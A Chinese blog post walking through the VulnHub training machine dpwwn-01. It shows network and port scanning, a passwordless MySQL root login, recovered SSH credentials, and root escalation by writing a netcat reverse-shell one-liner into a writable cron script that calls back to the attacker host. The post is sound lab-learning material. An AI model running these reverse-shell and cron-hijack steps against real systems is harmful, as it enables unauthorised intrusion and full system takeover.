vulnhub之dpwwn-01的实践

admin 2020年11月15日15:51:48评论240 views字数 866阅读2分53秒阅读模式

本周末实践的是vulnhub的dpwwn-01镜像,这个镜像比较简单,

下载地址,https://download.vulnhub.com/dpwwn/dpwwn-01.zip,

解压后一看就是vmware的虚机,当然就用workstation打开,

启动靶机,从console上没有看到ip地址,还是得自己去扫,

启动kali攻击机,先做地址扫描,

sudo netdiscover -r 192.168.137.0/24,

vulnhub之dpwwn-01的实践

拿到靶机地址,192.168.137.26,接着做端口扫描,

sudo nmap -sS -sV -T5 -A -p- 192.168.137.26,

vulnhub之dpwwn-01的实践

看到有mysql服务,尝试无密码连接一下,竟然进去了,

mysql -h 192.168.137.26 -u root -p,

然后经过一顿查询操作找到了一对儿用户名密码,

mistic/testP@$$swordmistic,

vulnhub之dpwwn-01的实践

用这对儿用户名密码尝试ssh登录一下,竟然也进去了,id一下发现不是root,接下来需要想办法提权,

vulnhub之dpwwn-01的实践

查看一下计划任务,cat /etc/crontab,发现/home/mistic/logrot.sh三分钟执行一次,而且这个脚本文件当前账户可写,

vulnhub之dpwwn-01的实践

在kali攻击机上制作反弹shell脚本内容,

msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.137.204 LPORT=4444 R,

并在kali攻击机上开启nc监听,nc -lnvp 4444,

vulnhub之dpwwn-01的实践

在靶机上执行echo -e '#!/bin/bashnmkfifo /tmp/slxjbbf; nc 192.168.137.204 4444 0</tmp/slxjbbf | /bin/sh >/tmp/slxjbbf 2>&1; rm /tmp/slxjbbf' > /home/mistic/logrot.sh,把反弹shell脚本内容写入定时任务脚本文件,

等待一会儿,就看到反弹shell过来了,id看一下,确认是root,完成。

vulnhub之dpwwn-01的实践


本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之dpwwn-01的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年11月15日15:51:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之dpwwn-01的实践http://cn-sec.com/archives/185414.html

发表评论

匿名网友 填写信息